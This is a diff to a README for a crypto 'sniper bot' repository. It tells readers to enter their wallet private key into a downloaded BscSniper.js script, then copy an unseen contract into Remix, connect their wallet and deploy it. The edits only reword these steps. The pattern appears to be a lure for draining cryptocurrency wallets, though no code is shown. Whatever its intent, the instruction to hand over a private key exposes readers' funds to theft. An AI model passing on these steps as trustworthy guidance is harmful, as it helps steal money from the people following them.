s3yi/my-sniperbot/README.md

 input your wallet address private key, you will get your sniper contract after deploying the contract in remix.

-download BscSniper.js put it in your folder
+download BscSniper.js file put it in your folder

-go to https://remix.ethereum.org/ and connect your evm wallet to your remix IDE, go to "contract folder" and create "SniperBot.sol" file , paste the codes in Sniper.sol file  and paste it there.
+go to https://remix.ethereum.org/ and connect your evm wallet to your remix IDE, go to "contract folder" and create "SniperBot.sol" file , copy the codes in Sniper.sol file  and paste it there.

 deploy contract and use these information: